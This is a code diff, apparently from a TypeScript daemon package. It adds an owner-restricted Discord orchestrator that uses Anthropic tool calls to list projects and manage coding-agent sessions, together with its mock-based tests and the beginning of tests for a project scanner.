this.createCallCount++; + this.lastCreateParams = params; + return this.createHandler(params); + }, + }; +} + +// --------------------------------------------------------------------------- +// Mock SessionManager +// --------------------------------------------------------------------------- + +function makeMockSession(overrides: Partial = {}): ManagedSession { + return { + sessionId: overrides.sessionId ?? 'sess-123', + projectDir: overrides.projectDir ?? '/home/user/project', + projectName: overrides.projectName ?? 'my-project', + status: overrides.status ?? ('running' as SessionStatus), + client: {} as ManagedSession['client'], + events: [], + pendingBlocker: null, + cost: overrides.cost ?? { totalCost: 0.1234, tokens: { input: 1000, output: 500, cacheRead: 0, cacheWrite: 0 } }, + startTime: overrides.startTime ?? 
Date.now() - 300_000, // 5 min ago + ...overrides, + }; +} + +class MockSessionManager { + public sessions: ManagedSession[] = []; + public startSessionCalls: Array<{ projectDir: string; command?: string }> = []; + public cancelSessionCalls: string[] = []; + public getResultCalls: string[] = []; + + async startSession(opts: { projectDir: string; command?: string }): Promise { + this.startSessionCalls.push(opts); + return 'sess-new-123'; + } + + getSession(sessionId: string): ManagedSession | undefined { + return this.sessions.find((s) => s.sessionId === sessionId); + } + + getAllSessions(): ManagedSession[] { + return this.sessions; + } + + async cancelSession(sessionId: string): Promise { + this.cancelSessionCalls.push(sessionId); + } + + getResult(sessionId: string): Record { + const session = this.sessions.find((s) => s.sessionId === sessionId); + if (!session) throw new Error(`Session not found: ${sessionId}`); + return { + sessionId: session.sessionId, + projectDir: session.projectDir, + projectName: session.projectName, + status: session.status, + durationMs: 300_000, + cost: session.cost, + recentEvents: [], + pendingBlocker: null, + error: null, + }; + } +} + +// --------------------------------------------------------------------------- +// Mock ChannelManager (unused by orchestrator directly, but required by deps) +// --------------------------------------------------------------------------- + +class MockChannelManager {} + +// --------------------------------------------------------------------------- +// Mock Discord Message +// --------------------------------------------------------------------------- + +function makeMessage(overrides: Partial<{ + authorId: string; + bot: boolean; + channelId: string; + content: string; +}>): DiscordMessageLike & { sentMessages: string[] } { + const sentMessages: string[] = []; + return { + author: { + id: overrides.authorId ?? 'owner-123', + bot: overrides.bot ?? false, + }, + channelId: overrides.channelId ?? 
'control-channel-1', + content: overrides.content ?? 'hello', + channel: { + send: async (content: string) => { + sentMessages.push(content); + }, + sendTyping: async () => {}, + }, + sentMessages, + }; +} + +// --------------------------------------------------------------------------- +// Test Setup Factory +// --------------------------------------------------------------------------- + +function makeOrchestrator(opts?: { + client?: MockAnthropicClient; + sessions?: ManagedSession[]; + projects?: ProjectInfo[]; +}) { + const dir = tmpDir(); + cleanupDirs.push(dir); + const logPath = join(dir, 'test.log'); + const logger = new Logger({ filePath: logPath, level: 'debug' }); + activeLoggers.push(logger); + + const sessionManager = new MockSessionManager(); + if (opts?.sessions) sessionManager.sessions = opts.sessions; + + const projects: ProjectInfo[] = opts?.projects ?? [ + { name: 'alpha', path: '/home/user/alpha', markers: ['git', 'node', 'gsd'], lastModified: Date.now() }, + { name: 'bravo', path: '/home/user/bravo', markers: ['git', 'rust'], lastModified: Date.now() }, + ]; + + const config: OrchestratorConfig = { + model: 'claude-sonnet-4-20250514', + max_tokens: 4096, + control_channel_id: 'control-channel-1', + }; + + const deps: OrchestratorDeps = { + sessionManager: sessionManager as unknown as OrchestratorDeps['sessionManager'], + channelManager: new MockChannelManager() as unknown as OrchestratorDeps['channelManager'], + scanProjects: async () => projects, + config, + logger, + ownerId: 'owner-123', + }; + + const mockClient = opts?.client ?? 
new MockAnthropicClient(); + const orchestrator = new Orchestrator(deps, mockClient as unknown as import('@anthropic-ai/sdk').default); + + return { orchestrator, mockClient, sessionManager, logger, logPath }; +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +describe('Orchestrator', () => { + // Clean up after each test so logger streams are flushed before dirs removed + afterEach(async () => { + await cleanupAll(); + }); + + // ---- Tool definitions ---- + + describe('tool definitions', () => { + it('passes 5 tools to the Anthropic API', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: 'what can you do?' }); + await orchestrator.handleMessage(msg); + + assert.ok(mockClient.lastCreateParams); + const tools = mockClient.lastCreateParams.tools as Array<{ name: string }>; + assert.equal(tools.length, 5); + + const names = tools.map((t) => t.name).sort(); + assert.deepEqual(names, [ + 'get_session_detail', + 'get_status', + 'list_projects', + 'start_session', + 'stop_session', + ]); + }); + }); + + // ---- list_projects tool ---- + + describe('list_projects tool', () => { + it('returns project list from scanProjects', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'Here are your projects'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'list my projects' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages.length, 1); + assert.equal(msg.sentMessages[0], 'Here are your projects'); + // The tool was called (2 create calls: tool_use + end_turn) + assert.equal(mockClient.createCallCount, 2); + }); + }); + + // ---- start_session tool ---- + + describe('start_session tool', () => { + it('calls sessionManager.startSession 
and returns confirmation', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'start_session', + { projectPath: '/home/user/alpha' }, + 'Started session for alpha', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'start alpha' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.startSessionCalls.length, 1); + assert.equal(sessionManager.startSessionCalls[0]!.projectDir, '/home/user/alpha'); + assert.equal(msg.sentMessages[0], 'Started session for alpha'); + }); + }); + + // ---- get_status tool ---- + + describe('get_status tool', () => { + it('returns formatted session status', async () => { + const session = makeMockSession({ projectName: 'alpha', status: 'running' as SessionStatus }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('get_status', {}, 'Status: alpha is running'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'status' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'Status: alpha is running'); + }); + + it('handles empty session list', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('get_status', {}, 'No sessions running'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [] }); + const msg = makeMessage({ content: 'status' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'No sessions running'); + }); + }); + + // ---- stop_session tool ---- + + describe('stop_session tool', () => { + it('stops session matched by sessionId', async () => { + const session = makeMockSession({ sessionId: 'sess-abc', projectName: 'alpha' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 
'stop_session', + { identifier: 'sess-abc' }, + 'Stopped alpha', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'stop sess-abc' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 1); + assert.equal(sessionManager.cancelSessionCalls[0], 'sess-abc'); + }); + + it('fuzzy matches by project name', async () => { + const session = makeMockSession({ sessionId: 'sess-xyz', projectName: 'my-big-project' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'stop_session', + { identifier: 'big-project' }, + 'Stopped my-big-project', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'stop big project' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 1); + assert.equal(sessionManager.cancelSessionCalls[0], 'sess-xyz'); + }); + + it('returns not-found for unmatched identifier', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'stop_session', + { identifier: 'nonexistent' }, + 'No session found', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient, sessions: [] }); + const msg = makeMessage({ content: 'stop nonexistent' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.cancelSessionCalls.length, 0); + }); + }); + + // ---- get_session_detail tool ---- + + describe('get_session_detail tool', () => { + it('returns formatted session detail', async () => { + const session = makeMockSession({ sessionId: 'sess-detail' }); + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'get_session_detail', + { sessionId: 'sess-detail' }, + 'Session details for my-project', + ), + ); + 
const { orchestrator } = makeOrchestrator({ client: mockClient, sessions: [session] }); + const msg = makeMessage({ content: 'detail sess-detail' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages[0], 'Session details for my-project'); + }); + }); + + // ---- Message routing / auth guards ---- + + describe('handleMessage routing', () => { + it('ignores bot messages', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ bot: true, content: 'hello from bot' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores non-owner messages', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ authorId: 'stranger-456', content: 'hack the planet' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores messages from non-control channels', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ channelId: 'random-channel', content: 'hello' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + assert.equal(msg.sentMessages.length, 0); + }); + + it('ignores empty message content', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: ' ' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 0); + }); + + it('routes valid message through LLM and sends response', async () => { + const { orchestrator, mockClient } = makeOrchestrator(); + const msg = makeMessage({ content: 'hello orchestrator' }); + await orchestrator.handleMessage(msg); + + assert.equal(mockClient.createCallCount, 1); + assert.equal(msg.sentMessages.length, 1); + assert.equal(msg.sentMessages[0], 'Mock LLM 
response'); + }); + }); + + // ---- Conversation history ---- + + describe('conversation history', () => { + it('accumulates user and assistant entries', async () => { + const { orchestrator } = makeOrchestrator(); + + await orchestrator.handleMessage(makeMessage({ content: 'first' })); + await orchestrator.handleMessage(makeMessage({ content: 'second' })); + + const history = orchestrator.getHistory(); + assert.equal(history.length, 4); // 2 user + 2 assistant + assert.equal(history[0]!.role, 'user'); + assert.equal(history[1]!.role, 'assistant'); + assert.equal(history[2]!.role, 'user'); + assert.equal(history[3]!.role, 'assistant'); + }); + + it('trims to MAX_HISTORY (30) by removing oldest pairs', async () => { + const { orchestrator } = makeOrchestrator(); + + // Send 17 messages → 34 history entries (17 user + 17 assistant) + // After trimming: should be ≤30 + for (let i = 0; i < 17; i++) { + await orchestrator.handleMessage(makeMessage({ content: `msg-${i}` })); + } + + const history = orchestrator.getHistory(); + assert.ok(history.length <= 30, `History length ${history.length} exceeds 30`); + // Should have trimmed from the front — oldest entries gone + // 34 entries → trim 2 at a time until ≤30 → 30 entries (trimmed 4) + assert.equal(history.length, 30); + }); + }); + + // ---- Error handling ---- + + describe('error handling', () => { + it('sends error message to Discord when LLM API throws', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.errorHandler('API rate limit exceeded'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'hello' }); + await orchestrator.handleMessage(msg); + + assert.equal(msg.sentMessages.length, 1); + assert.ok(msg.sentMessages[0]!.includes('Something went wrong')); + }); + + it('appends error placeholder to history on LLM failure', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.errorHandler('Network 
error'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient }); + await orchestrator.handleMessage(makeMessage({ content: 'fail' })); + + const history = orchestrator.getHistory(); + assert.equal(history.length, 2); // user + error assistant + assert.equal(history[1]!.role, 'assistant'); + assert.equal(history[1]!.content, '[error — see logs]'); + }); + }); + + // ---- stop() ---- + + describe('stop()', () => { + it('clears conversation history and nulls client', async () => { + const { orchestrator } = makeOrchestrator(); + + await orchestrator.handleMessage(makeMessage({ content: 'hello' })); + assert.ok(orchestrator.getHistory().length > 0); + + orchestrator.stop(); + assert.equal(orchestrator.getHistory().length, 0); + }); + }); + + // ---- Tool execution direct tests ---- + + describe('tool execution (via agent loop)', () => { + it('list_projects returns empty message when no projects', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler('list_projects', {}, 'No projects'), + ); + const { orchestrator } = makeOrchestrator({ client: mockClient, projects: [] }); + const msg = makeMessage({ content: 'list' }); + await orchestrator.handleMessage(msg); + + // The second create call receives the tool result + assert.equal(mockClient.createCallCount, 2); + }); + + it('start_session with optional command passes through', async () => { + const mockClient = new MockAnthropicClient( + MockAnthropicClient.toolThenTextHandler( + 'start_session', + { projectPath: '/p', command: '/gsd quick fix tests' }, + 'Started', + ), + ); + const { orchestrator, sessionManager } = makeOrchestrator({ client: mockClient }); + const msg = makeMessage({ content: 'start with custom command' }); + await orchestrator.handleMessage(msg); + + assert.equal(sessionManager.startSessionCalls.length, 1); + assert.equal(sessionManager.startSessionCalls[0]!.command, '/gsd quick fix tests'); + }); + }); + +}); diff --git 
a/packages/daemon/src/orchestrator.ts b/packages/daemon/src/orchestrator.ts new file mode 100644 index 000000000..678874cec --- /dev/null +++ b/packages/daemon/src/orchestrator.ts @@ -0,0 +1,544 @@ +/** + * Orchestrator — LLM-powered agent for the #gsd-control Discord channel. + * + * Receives Discord messages, maintains conversation history, calls the + * Anthropic messages API with 5 tool definitions (list_projects, start_session, + * get_status, stop_session, get_session_detail), and sends the LLM's response + * back to Discord. + * + * Uses the standard messages.create() tool-use loop (not betaZodTool helpers, + * which don't exist in SDK v0.52). Zod schemas are used for input validation + * at the tool execution layer. + */ + +import { z } from 'zod'; +import { readFileSync, writeFileSync, chmodSync } from 'node:fs'; +import { join } from 'node:path'; +import { homedir } from 'node:os'; +import type Anthropic from '@anthropic-ai/sdk'; +import type { + MessageParam, + ContentBlockParam, + Tool, + ToolResultBlockParam, + ToolUseBlock, + TextBlock, +} from '@anthropic-ai/sdk/resources/messages/messages'; +import type { SessionManager } from './session-manager.js'; +import type { ChannelManager } from './channel-manager.js'; +import type { ProjectInfo, ManagedSession } from './types.js'; +import type { Logger } from './logger.js'; + +// --------------------------------------------------------------------------- +// OAuth token resolution — reads GSD's auth.json, refreshes if expired +// --------------------------------------------------------------------------- + +interface OAuthCredentials { + type: 'oauth'; + refresh: string; + access: string; + expires: number; +} + +const TOKEN_URL = 'https://platform.claude.com/v1/oauth/token'; +const CLIENT_ID = atob('OWQxYzI1MGEtZTYxYi00NGQ5LTg4ZWQtNTk0NGQxOTYyZjVl'); + +/** + * Read the Anthropic OAuth access token from GSD's auth.json. + * If expired, refresh it and write the new credentials back. 
+ * Falls back to ANTHROPIC_API_KEY env var if no OAuth credential exists. + */ +async function resolveAnthropicApiKey(logger?: Logger): Promise { + // Try env var first (explicit override) + if (process.env.ANTHROPIC_API_KEY) { + return process.env.ANTHROPIC_API_KEY; + } + + const authPath = join(homedir(), '.gsd', 'agent', 'auth.json'); + let authData: Record; + try { + authData = JSON.parse(readFileSync(authPath, 'utf-8')); + } catch { + throw new Error( + 'No Anthropic auth found. Run `gsd login` to authenticate, or set ANTHROPIC_API_KEY.', + ); + } + + const cred = authData.anthropic as OAuthCredentials | undefined; + if (!cred || cred.type !== 'oauth' || !cred.access) { + throw new Error( + 'No Anthropic OAuth credential in auth.json. Run `gsd login` to authenticate.', + ); + } + + // If token is still valid, use it + if (Date.now() < cred.expires) { + return cred.access; + } + + // Token expired — refresh it + logger?.info('orchestrator: refreshing Anthropic OAuth token'); + const response = await fetch(TOKEN_URL, { + method: 'POST', + headers: { 'Content-Type': 'application/json' }, + body: JSON.stringify({ + grant_type: 'refresh_token', + client_id: CLIENT_ID, + refresh_token: cred.refresh, + }), + signal: AbortSignal.timeout(30_000), + }); + + if (!response.ok) { + const error = await response.text(); + throw new Error(`Anthropic token refresh failed: ${error}`); + } + + const data = (await response.json()) as { + access_token: string; + refresh_token: string; + expires_in: number; + }; + + const newCred: OAuthCredentials = { + type: 'oauth', + refresh: data.refresh_token, + access: data.access_token, + expires: Date.now() + data.expires_in * 1000 - 5 * 60 * 1000, + }; + + // Write back to auth.json + authData.anthropic = newCred; + writeFileSync(authPath, JSON.stringify(authData, null, 2), 'utf-8'); + chmodSync(authPath, 0o600); + logger?.info('orchestrator: Anthropic OAuth token refreshed'); + + return newCred.access; +} + +// 
--------------------------------------------------------------------------- +// Configuration +// --------------------------------------------------------------------------- + +export interface OrchestratorConfig { + model: string; + max_tokens: number; + control_channel_id: string; +} + +export interface OrchestratorDeps { + sessionManager: SessionManager; + channelManager: ChannelManager; + scanProjects: () => Promise; + config: OrchestratorConfig; + logger: Logger; + ownerId: string; +} + +// --------------------------------------------------------------------------- +// System Prompt +// --------------------------------------------------------------------------- + +const SYSTEM_PROMPT = `You are GSD Control — a concise, capable orchestrator for managing GSD (Get Shit Done) coding agent sessions via Discord. + +You have tools to list projects, start sessions, get status, stop sessions, and inspect session details. Use them to fulfill the user's requests. + +Response guidelines: +- Be terse and direct. No filler, no performed enthusiasm. +- When reporting status, use bullet points with project name, status, duration, and cost. +- When starting a session, confirm with the project name and session ID. +- When stopping a session, confirm which session was stopped. +- If something fails, say what went wrong plainly. +- Use Discord markdown formatting (bold, code blocks) for readability. +- Never expose internal error stack traces to the user — summarize the issue.`; + +// --------------------------------------------------------------------------- +// Tool Definitions (Anthropic API format) +// --------------------------------------------------------------------------- + +const TOOLS: Tool[] = [ + { + name: 'list_projects', + description: 'List all detected projects across configured scan roots. 
Returns project names, paths, and detected markers (git, node, gsd, etc.).', + input_schema: { + type: 'object' as const, + properties: {}, + required: [], + }, + }, + { + name: 'start_session', + description: 'Start a new GSD auto-mode session for a project. Provide the absolute project path. Optionally provide a command to run instead of the default "/gsd auto".', + input_schema: { + type: 'object' as const, + properties: { + projectPath: { type: 'string', description: 'Absolute path to the project directory' }, + command: { type: 'string', description: 'Optional command to send instead of "/gsd auto"' }, + }, + required: ['projectPath'], + }, + }, + { + name: 'get_status', + description: 'Get the current status of all active GSD sessions. Shows project name, status, duration, and cost for each.', + input_schema: { + type: 'object' as const, + properties: {}, + required: [], + }, + }, + { + name: 'stop_session', + description: 'Stop a running GSD session. Provide a session ID or project name — fuzzy matching is used to find the session.', + input_schema: { + type: 'object' as const, + properties: { + identifier: { type: 'string', description: 'Session ID or project name to match' }, + }, + required: ['identifier'], + }, + }, + { + name: 'get_session_detail', + description: 'Get detailed information about a specific session including cost breakdown, recent events, pending blockers, and error state.', + input_schema: { + type: 'object' as const, + properties: { + sessionId: { type: 'string', description: 'The session ID to inspect' }, + }, + required: ['sessionId'], + }, + }, +]; + +// --------------------------------------------------------------------------- +// Zod schemas for tool input validation +// --------------------------------------------------------------------------- + +const StartSessionInput = z.object({ + projectPath: z.string(), + command: z.string().optional(), +}); + +const StopSessionInput = z.object({ + identifier: z.string(), +}); + +const 
GetSessionDetailInput = z.object({ + sessionId: z.string(), +}); + +// --------------------------------------------------------------------------- +// Conversation History Cap +// --------------------------------------------------------------------------- + +const MAX_HISTORY = 30; + +// --------------------------------------------------------------------------- +// Orchestrator +// --------------------------------------------------------------------------- + +export class Orchestrator { + private readonly deps: OrchestratorDeps; + private client: Anthropic | null; + private history: MessageParam[] = []; + + /** + * @param deps - orchestrator dependencies (session manager, channel manager, etc.) + * @param client - optional Anthropic client for testability; if omitted, created from env + */ + constructor(deps: OrchestratorDeps, client?: Anthropic) { + this.deps = deps; + this.client = client ?? null; + } + + /** + * Lazily initialise the Anthropic client. Dynamic import handles K007 module resolution. + * Resolves auth from GSD's OAuth credentials (auth.json), refreshing if needed. + */ + private async getClient(): Promise { + if (this.client) return this.client; + const apiKey = await resolveAnthropicApiKey(this.deps.logger); + const { default: AnthropicSDK } = await import('@anthropic-ai/sdk'); + this.client = new AnthropicSDK({ apiKey }); + return this.client; + } + + /** + * Handle an incoming Discord message. Entry point called by the bot's + * message handler for every message in every channel. + * + * Guards: ignores bot messages, non-owner messages, and non-control-channel messages. 
+ */ + async handleMessage(message: DiscordMessageLike): Promise { + // Ignore bot messages + if (message.author.bot) return; + + // Ignore non-control-channel messages + if (message.channelId !== this.deps.config.control_channel_id) return; + + // Auth guard — only the owner can use the orchestrator + if (message.author.id !== this.deps.ownerId) { + this.deps.logger.debug('orchestrator auth rejected', { userId: message.author.id }); + return; + } + + const content = message.content?.trim(); + if (!content) return; + + this.deps.logger.info('orchestrator message received', { + userId: message.author.id, + channelId: message.channelId, + contentLength: content.length, + }); + + // Append user message to history + this.history.push({ role: 'user', content }); + + try { + // Show typing indicator while processing + await message.channel.sendTyping().catch(() => {}); + + const responseText = await this.runAgentLoop(); + + // Send response to Discord + await message.channel.send(responseText); + + this.deps.logger.info('orchestrator response sent', { + channelId: message.channelId, + responseLength: responseText.length, + }); + } catch (err) { + const errorMsg = err instanceof Error ? err.message : String(err); + + // Invalidate cached client on auth errors so next call re-resolves OAuth token + if (errorMsg.includes('authentication') || errorMsg.includes('apiKey') || errorMsg.includes('authToken') || errorMsg.includes('401')) { + this.client = null; + } + + this.deps.logger.error('orchestrator error', { + error: errorMsg, + userId: message.author.id, + channelId: message.channelId, + }); + + // Send error feedback to Discord + try { + await message.channel.send('⚠️ Something went wrong processing your request.'); + } catch (sendErr) { + this.deps.logger.warn('orchestrator error reply failed', { + error: sendErr instanceof Error ? 
sendErr.message : String(sendErr),
+        });
+      }
+
+      // Still append a synthetic assistant message so history stays paired
+      this.history.push({ role: 'assistant', content: '[error — see logs]' });
+    }
+
+    this.trimHistory();
+  }
+
+  /**
+   * Run the tool-use loop: call messages.create(), execute any tool calls,
+   * feed results back, repeat until the model produces a final text response.
+   *
+   * Every exit path pushes exactly one assistant entry onto this.history so
+   * the user/assistant pairing assumed by trimHistory() is preserved.
+   */
+  private async runAgentLoop(): Promise<string> {
+    const client = await this.getClient();
+    const { model, max_tokens } = this.deps.config;
+
+    let loopMessages: MessageParam[] = [...this.history];
+    const maxIterations = 10; // safety valve
+
+    for (let i = 0; i < maxIterations; i++) {
+      const response = await client.messages.create({
+        model,
+        max_tokens,
+        system: SYSTEM_PROMPT,
+        tools: TOOLS,
+        messages: loopMessages,
+      });
+
+      // Any stop reason other than tool_use (end_turn, max_tokens, …) means
+      // there are no tool calls to run — extract the text and return.
+      if (response.stop_reason !== 'tool_use') {
+        const textBlocks = response.content.filter(
+          (b): b is TextBlock => b.type === 'text',
+        );
+        const finalText = textBlocks.map((b) => b.text).join('\n') || '(No response)';
+
+        // Append assistant message to conversation history
+        this.history.push({ role: 'assistant', content: finalText });
+
+        return finalText;
+      }
+
+      // Model wants to use tools — execute them all
+      const toolUseBlocks = response.content.filter(
+        (b): b is ToolUseBlock => b.type === 'tool_use',
+      );
+
+      // Build tool results
+      const toolResults: ToolResultBlockParam[] = [];
+      for (const toolUse of toolUseBlocks) {
+        const result = await this.executeTool(toolUse.name, toolUse.input as Record<string, unknown>);
+        toolResults.push({
+          type: 'tool_result',
+          tool_use_id: toolUse.id,
+          content: result,
+        });
+      }
+
+      // Append the assistant message (with tool_use blocks) and user tool_result message
+      loopMessages = [
+        ...loopMessages,
+        { role: 'assistant', content: response.content as ContentBlockParam[] },
+        { role: 'user', content: toolResults },
+      ];
+    }
+
+    // Hit max iterations. Push the fallback into history before returning —
+    // otherwise the user entry pushed by handleMessage has no assistant pair
+    // and trimHistory's pairwise splice(0, 2) drifts out of alignment.
+    const fallback = 'I hit the maximum number of tool iterations. Please try a simpler request.';
+    this.history.push({ role: 'assistant', content: fallback });
+    return fallback;
+  }
+
+  /**
+   * Execute a single tool by name. Returns a string result for the LLM.
+   * All errors are caught and returned as error strings (the LLM can reason about them).
+   */
+  private async executeTool(name: string, input: Record<string, unknown>): Promise<string> {
+    try {
+      switch (name) {
+        case 'list_projects':
+          return await this.toolListProjects();
+        case 'start_session':
+          return await this.toolStartSession(input);
+        case 'get_status':
+          return this.toolGetStatus();
+        case 'get_session_detail':
+          return this.toolGetSessionDetail(input);
+        case 'stop_session':
+          return await this.toolStopSession(input);
+        default:
+          return `Unknown tool: ${name}`;
+      }
+    } catch (err) {
+      const msg = err instanceof Error ? err.message : String(err);
+      this.deps.logger.error('tool execution error', { tool: name, error: msg });
+      return `Error: ${msg}`;
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Tool implementations
+  // ---------------------------------------------------------------------------
+
+  private async toolListProjects(): Promise<string> {
+    const projects = await this.deps.scanProjects();
+    if (projects.length === 0) return 'No projects found.';
+    return JSON.stringify(
+      projects.map((p) => ({ name: p.name, path: p.path, markers: p.markers })),
+      null,
+      2,
+    );
+  }
+
+  private async toolStartSession(input: Record<string, unknown>): Promise<string> {
+    const parsed = StartSessionInput.parse(input);
+    const sessionId = await this.deps.sessionManager.startSession({
+      projectDir: parsed.projectPath,
+      command: parsed.command,
+    });
+    return `Session started: ${sessionId} for ${parsed.projectPath}`;
+  }
+
+  private toolGetStatus(): string {
+    const sessions = this.deps.sessionManager.getAllSessions();
+    if (sessions.length === 0) return 'No active sessions.';
+
+    return sessions
+      .map((s: ManagedSession) => {
+        const
durationMin = Math.floor((Date.now() - s.startTime) / 60_000);
+        const cost = s.cost.totalCost.toFixed(4);
+        return `• ${s.projectName} — ${s.status} (${durationMin}m, $${cost})`;
+      })
+      .join('\n');
+  }
+
+  private async toolStopSession(input: Record<string, unknown>): Promise<string> {
+    const parsed = StopSessionInput.parse(input);
+    const { identifier } = parsed;
+
+    // Try exact sessionId match first
+    const byId = this.deps.sessionManager.getSession(identifier);
+    if (byId) {
+      await this.deps.sessionManager.cancelSession(identifier);
+      return `Stopped session ${identifier} (${byId.projectName})`;
+    }
+
+    // Fuzzy match by project name
+    const all = this.deps.sessionManager.getAllSessions();
+    const match = all.find(
+      (s: ManagedSession) =>
+        s.projectName.toLowerCase().includes(identifier.toLowerCase()) ||
+        s.projectDir.toLowerCase().includes(identifier.toLowerCase()),
+    );
+    if (match) {
+      await this.deps.sessionManager.cancelSession(match.sessionId);
+      return `Stopped session ${match.sessionId} (${match.projectName})`;
+    }
+
+    return `No session found matching "${identifier}"`;
+  }
+
+  private toolGetSessionDetail(input: Record<string, unknown>): string {
+    const parsed = GetSessionDetailInput.parse(input);
+    const result = this.deps.sessionManager.getResult(parsed.sessionId);
+    return JSON.stringify(result, null, 2);
+  }
+
+  // ---------------------------------------------------------------------------
+  // History management
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Trim conversation history to MAX_HISTORY entries.
+   * Removes the oldest user+assistant pair from the front to keep pairs aligned.
+   */
+  private trimHistory(): void {
+    while (this.history.length > MAX_HISTORY) {
+      // Remove from front — two messages at a time to keep user/assistant pairs
+      this.history.splice(0, 2);
+    }
+  }
+
+  /**
+   * Return a copy of the conversation history (for debugging / observability).
+   */
+  getHistory(): MessageParam[] {
+    return [...this.history];
+  }
+
+  /**
+   * Stop the orchestrator — clears history and nulls client reference.
+   */
+  stop(): void {
+    this.history = [];
+    this.client = null;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Discord message type (minimal interface for testability)
+// ---------------------------------------------------------------------------
+
+/**
+ * Minimal Discord message interface — avoids importing discord.js directly,
+ * making the orchestrator testable without full discord.js mocking.
+ */
+export interface DiscordMessageLike {
+  author: { id: string; bot: boolean };
+  channelId: string;
+  content: string;
+  channel: {
+    // NOTE(review): return values are never used by the orchestrator, so
+    // Promise<unknown> keeps this assignable from discord.js — confirm.
+    send: (content: string) => Promise<unknown>;
+    sendTyping: () => Promise<unknown>;
+  };
+}
diff --git a/packages/daemon/src/project-scanner.test.ts b/packages/daemon/src/project-scanner.test.ts
new file mode 100644
index 000000000..6812c3871
--- /dev/null
+++ b/packages/daemon/src/project-scanner.test.ts
@@ -0,0 +1,235 @@
+/**
+ * Tests for the project scanner module.
+ */
+
+import { describe, it, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, chmodSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir, platform } from 'node:os';
+import { randomUUID } from 'node:crypto';
+import { scanForProjects } from './project-scanner.js';
+
+// ---------- helpers ----------
+
+function tmpDir(): string {
+  return mkdtempSync(join(tmpdir(), `scanner-test-${randomUUID().slice(0, 8)}-`));
+}
+
+const cleanupDirs: string[] = [];
+afterEach(() => {
+  while (cleanupDirs.length) {
+    const d = cleanupDirs.pop()!;
+    if (existsSync(d)) rmSync(d, { recursive: true, force: true });
+  }
+});
+
+/** Create a project directory with specified marker files/dirs */
+function createProject(root: string, name: string, markers: string[]): string {
+  const projDir = join(root, name);
+  mkdirSync(projDir, { recursive: true });
+  for (const marker of markers) {
+    const markerPath = join(projDir, marker);
+    // Directory markers are dotfiles with no extension after the leading dot
+    // (.git, .gsd). The dot must be skipped before the extension check —
+    // `!marker.includes('.')` would always be false for a dotted name.
+    if (marker.startsWith('.') && !marker.slice(1).includes('.')) {
+      mkdirSync(markerPath, { recursive: true });
+    } else {
+      // File marker (package.json, Cargo.toml, etc.)
+      writeFileSync(markerPath, '{}');
+    }
+  }
+  return projDir;
+}
+
+// ---------- tests ----------
+
+describe('scanForProjects', () => {
+  it('finds projects with marker files', async () => {
+    const root = tmpDir();
+    cleanupDirs.push(root);
+
+    createProject(root, 'my-app', ['.git', 'package.json']);
+
+    const results = await scanForProjects([root]);
+
+    assert.equal(results.length, 1);
+    assert.equal(results[0]!.name, 'my-app');
+    assert.equal(results[0]!.path, join(root, 'my-app'));
+    assert.ok(results[0]!.markers.includes('git'));
+    assert.ok(results[0]!.markers.includes('node'));
+    assert.ok(results[0]!.lastModified > 0);
+  });
+
